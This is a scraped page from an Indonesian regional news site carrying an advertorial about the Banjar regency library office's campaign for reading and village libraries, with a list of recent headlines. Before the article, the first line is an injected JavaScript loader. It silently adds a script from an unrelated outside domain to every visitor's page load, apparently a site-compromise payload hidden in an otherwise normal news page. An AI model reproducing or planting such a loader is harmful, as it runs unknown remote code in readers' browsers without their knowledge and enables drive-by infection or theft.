(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Bangkitkan Minat Baca, Dispersip Banjar Siapkan Perpustakaan Desa


MARTAPURA, Implementasi revolusi mental melalui mobilisasi pengetahuan dalam rangka meningkatkan indeks literasi masyarakat, Dinas Perpustakaan dan Arsip (Dispersip) Kabupaten Banjar gelar acara safari gerakan nasional pembudayaan gemar membaca.

Acara berlangsung di Aula Dinas Pendidikan Kabupaten Banjar, Sabtu (21/7), dihadiri oleh Sekda Banjar Ir H Nasrunsyah, Kepala Dispersip KalselDra Hj Nurliani Dardie, Anggota Komisi X DPR RI, dan perwakilan dari Perpusnas RI.

Sekda Banjar Nasrunsyah mengatakan, kegiatan gemar membaca ini sangat penting sebagai upaya untuk meningkatkan pengetahuan sumberdaya manusia yang terdidik serta mampu beradaptasi dengan perkembangan teknologi.

“Di Kabupaten Banjar kita tidak hanya mengajak masyarakat untuk gemar membaca saja, tetapi ingin menjadikan perpustakaan sebagai roda perekonomian, bahwa dengan sistem online membaca dapat meningkatkan kualitas masyarakat itu sendiri,” ujarnya.

Nasrun berharap, layanan perpustakaan juga bisa dinikmati hingga ke pelosok desa dengan menggunakan IT, sehingga otomatis juga dapat meningkatkan sumberdaya manusia yang berada di pelosok melalui kegiatan membaca tersebut.

“Mudah-mudahan perpustakaan di Kabupaten Banjar ini kedepan lebih maju lagi, dan dimiliki oleh setiap desa dengan menggunakan sistem IT, walaupun terkendala oleh mobil perpustakaan yang seadanya, namun kita berharap dapat mendorong kegemaran membaca hingga tingkat desa,” bebernya.

Sementara itu ketika ditanya Kanal Kalimantan, terkait tingkat kegemaran membaca di Kabupaten Banjar, Kepala Dispersip Banjar Yasna Khairina mengatakan, tingkat kegemaran membaca jika dilihat dari minat dan mendatangi pelaku membaca masih terbatas dengan akses terhadap bahan bacaan.


“Keterbatasan akses menjadi kendala untuk meningkatkan minat baca, seperti di desa tidak ada pustaka, yang ada hanya di ibukota kabupaten, namun ada upaya untuk mendekatkan akses melalui perpustakaan desa, mudah-mudahan minat baca bisa lebih meningkat,” ujarnya.

Ketersedian stok buku di Dispersip Kabupaten Banjar juga terus meningkat dan untuk tahun depan ada wacana untuk membuatkan buku digital yang bisa diakses dari rumah dengan konsep sama seperti di perpustakaan pada umumnya.

“Atas perhatian Bupati Banjar, Alhamdulillah stok buku di perpustakaan kita setiap tahun selalu meningkat, bahkan pengadaan anggarannya tahun ini juga bertambah, hingga tahun depan mudah-mudahan kita bisa mengadakan sistem buku digital yang bisa diakses melalui smartphone,” jelasnya.

Sementara itu ketika ditanya program untuk meningkatkan minat baca itu sendiri yang ada pada saait ini, Yasna mengatakan adapun program yang dijalankan seperti mobil keliling, kunjungan anak sekolah, dan dalam waktu dekat akan mengundang nara sumber untuk pelatihan hypnoselling.

“Tidak ketinggalan pada tahun ini untuk kearifan lokalnya dengan masyarakat yang religi seperti di Kabupaten Banjar kami juga akan menyediakan kitab kuning untuk menarik minat baca santri-santri di pesantren,” pungkasnya. (rendy)

Reporter : Rendy
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

1 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

2 jam ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

2 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

3 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

4 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

17 jam ago

This website uses cookies.